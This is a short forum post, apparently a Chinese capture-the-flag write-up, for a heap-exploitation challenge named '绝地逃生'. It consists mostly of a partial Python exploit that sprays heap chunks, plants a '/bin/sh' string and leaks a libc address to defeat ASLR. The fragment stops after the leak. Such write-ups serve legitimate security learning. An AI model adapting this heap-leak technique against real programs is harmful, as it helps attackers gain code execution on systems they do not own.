-
-
[原创]绝地逃生 WP
-
发表于: 2019-6-26 12:25 5358
-
一血题。
没啥好说的,放WP,注意这个不能保证每次都能成功。
try:
add(0, 0xF8, 'A' * 1)
add(1, 0x68, 'B' * 1)
add(2, 0x68, 'C' * 1)
add(3, 0x68, '/bin/sh\x00' * 1)
for i in range(252):
add(i + 4, 0x10, 'A' * 1)
free(2, 254, 255)
except:
return
show(0)
leak_addr = p.recvuntil('\n1. ',drop = True)
leak_addr = u64(leak_addr.ljust(8, '\x00'))
print 'leak_addr ',hex(leak_addr)
libc.address = leak_addr - 96 - 0x10 - libc.symbols['__malloc_hook']
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2019-6-26 12:26
被xym编辑
,原因:
赞赏
他的文章
- [原创]第十二题 深入内核 4064
- [原创]第十一题 步步逼近 4525
- [原创]第八题 AI核心地带 3454
- [原创] 第七题 智能联盟计划 3623
- 第六题 至暗时刻 10387
看原图
赞赏
雪币:
留言: